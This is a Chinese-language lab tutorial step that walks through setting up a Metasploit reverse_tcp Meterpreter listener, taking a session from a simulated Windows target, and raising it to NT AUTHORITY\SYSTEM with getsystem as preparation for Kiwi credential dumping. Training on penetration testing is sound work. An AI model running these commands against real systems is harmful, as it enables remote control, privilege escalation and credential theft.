在 Windows 目标上获得具有 SYSTEM 权限的 Meterpreter 会话
在此步骤中,我们将模拟访问目标机器。在实际场景中,你将使用 exploit 来传递 payload。在这里,我们将使用 Metasploit Framework 控制台设置一个监听器。然后,一个模拟的目标将连接到我们的监听器,从而为我们提供一个 Meterpreter 会话。
首先,启动 Metasploit 控制台。-q 标志使其静默启动,不显示 banner。
msfconsole -q
接下来,我们将配置一个监听器来“捕获”来自模拟目标的传入连接。为此,我们使用 multi/handler 模块。
use multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
现在,使用 exploit -j 将监听器作为后台作业运行。
exploit -j
片刻之后,将创建一个会话。你可以使用 sessions 命令列出活动会话。
sessions
你应该会看到一个指示活动会话的输出,类似于:
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows WIN-TARGET\LabUser @ WIN-TARGET 127.0.0.1:4444 -> 127.0.0.1:54321 (...)
现在,与会话 1 进行交互。
sessions -i 1
你的提示符将变为 meterpreter >。为了有效使用 Kiwi,我们需要最高级别的权限,即 NT AUTHORITY\SYSTEM。我们可以尝试使用 getsystem 命令来提升我们的权限。
getsystem
你应该会看到一条 ...got system 消息。通过运行 getuid 来验证你的新身份。
getuid
预期的输出应该是:
Server username: NT AUTHORITY\SYSTEM
现在你拥有了一个具有 SYSTEM 权限的 Meterpreter 会话,可以进行下一步操作了。